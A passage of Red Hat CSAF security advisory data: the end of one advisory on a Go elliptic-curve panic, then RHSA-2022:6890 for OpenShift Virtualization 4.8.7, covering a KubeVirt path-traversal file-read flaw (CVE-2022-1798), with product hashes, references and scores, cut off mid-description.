"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-28327", }, { category: "external", summary: "RHBZ#2077689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077689", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-28327", url: "https://www.cve.org/CVERecord?id=CVE-2022-28327", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-28327", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-28327", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", url: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", }, ], release_date: "2022-04-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crypto/elliptic: panic caused by oversized scalar", }, ], }
RHSA-2022:6890
Vulnerability from csaf_redhat
Published
2022-10-11 16:02
Modified
2024-11-22 18:27
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.8.7 Images bug fixes and security update
Notes
Topic
Red Hat OpenShift Virtualization release 4.8.7 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This advisory contains the following OpenShift Virtualization 4.8.7 images:
RHEL-8-CNV-4.8
==============
vm-import-controller-container-v4.8.7-4
ovs-cni-marker-container-v4.8.7-6
virt-cdi-apiserver-container-v4.8.7-4
virt-cdi-uploadserver-container-v4.8.7-4
virt-cdi-uploadproxy-container-v4.8.7-4
vm-import-virtv2v-container-v4.8.7-4
hostpath-provisioner-container-v4.8.7-4
ovs-cni-plugin-container-v4.8.7-5
bridge-marker-container-v4.8.7-5
virt-cdi-controller-container-v4.8.7-4
node-maintenance-operator-container-v4.8.7-4
cluster-network-addons-operator-container-v4.8.7-5
cnv-containernetworking-plugins-container-v4.8.7-5
virt-cdi-importer-container-v4.8.7-4
vm-import-operator-container-v4.8.7-4
kubemacpool-container-v4.8.7-5
kubevirt-vmware-container-v4.8.7-4
kubevirt-v2v-conversion-container-v4.8.7-4
kubernetes-nmstate-handler-container-v4.8.7-5
virtio-win-container-v4.8.7-4
kubevirt-ssp-operator-container-v4.8.7-3
virt-cdi-operator-container-v4.8.7-4
cnv-must-gather-container-v4.8.7-4
hyperconverged-cluster-operator-container-v4.8.7-4
virt-cdi-cloner-container-v4.8.7-4
hostpath-provisioner-operator-container-v4.8.7-4
hyperconverged-cluster-webhook-container-v4.8.7-4
kubevirt-template-validator-container-v4.8.7-4
virt-handler-container-v4.8.7-5
virt-api-container-v4.8.7-5
virt-operator-container-v4.8.7-5
virt-launcher-container-v4.8.7-5
virt-controller-container-v4.8.7-5
hco-bundle-registry-container-v4.8.7-28
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.8.7 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "This advisory contains the following OpenShift Virtualization 4.8.7 images:\n\nRHEL-8-CNV-4.8\n\n==============\n\nvm-import-controller-container-v4.8.7-4\novs-cni-marker-container-v4.8.7-6\nvirt-cdi-apiserver-container-v4.8.7-4\nvirt-cdi-uploadserver-container-v4.8.7-4\nvirt-cdi-uploadproxy-container-v4.8.7-4\nvm-import-virtv2v-container-v4.8.7-4\nhostpath-provisioner-container-v4.8.7-4\novs-cni-plugin-container-v4.8.7-5\nbridge-marker-container-v4.8.7-5\nvirt-cdi-controller-container-v4.8.7-4\nnode-maintenance-operator-container-v4.8.7-4\ncluster-network-addons-operator-container-v4.8.7-5\ncnv-containernetworking-plugins-container-v4.8.7-5\nvirt-cdi-importer-container-v4.8.7-4\nvm-import-operator-container-v4.8.7-4\nkubemacpool-container-v4.8.7-5\nkubevirt-vmware-container-v4.8.7-4\nkubevirt-v2v-conversion-container-v4.8.7-4\nkubernetes-nmstate-handler-container-v4.8.7-5\nvirtio-win-container-v4.8.7-4\nkubevirt-ssp-operator-container-v4.8.7-3\nvirt-cdi-operator-container-v4.8.7-4\ncnv-must-gather-container-v4.8.7-4\nhyperconverged-cluster-operator-container-v4.8.7-4\nvirt-cdi-cloner-container-v4.8.7-4\nhostpath-provisioner-operator-container-v4.8.7-4\nhyperconverged-cluster-webhook-container-v4.8.7-4\nkubevirt-template-validator-container-v4.8.7-4\nvirt-handler-container-v4.8.7-5\nvirt-api-container-v4.8.7-5\nvirt-operator-container-v4.8.7-5\nvirt-launcher-container-v4.8.7-5\nvirt-controller-container-v4.8.7-5\nhco-bundle-registry-container-v4.8.7-28\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6890", url: "https://access.redhat.com/errata/RHSA-2022:6890", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6890.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.8.7 Images bug fixes and security update", tracking: { current_release_date: "2024-11-22T18:27:58+00:00", generator: { date: "2024-11-22T18:27:58+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.1", }, }, id: "RHSA-2022:6890", initial_release_date: "2022-10-11T16:02:33+00:00", revision_history: [ { date: "2022-10-11T16:02:33+00:00", number: "1", summary: "Initial version", }, { date: "2022-10-11T16:02:33+00:00", number: "2", summary: "Last updated version", }, { date: "2024-11-22T18:27:58+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.8 for RHEL 8", product: { name: "CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.8::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", product: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", product_id: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", product_identification_helper: { purl: "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8&tag=v4.8.7-5", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", product: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", product_id: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", product: { name: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", product_id: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", product: { name: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", product_id: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", product_identification_helper: { purl: "pkg:oci/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", product: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", product_id: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", product: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", product_id: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", product: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", product_id: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8&tag=v4.8.7-4", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", }, product_reference: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", }, product_reference: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", }, product_reference: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", }, product_reference: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", }, product_reference: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", }, product_reference: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", }, product_reference: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt 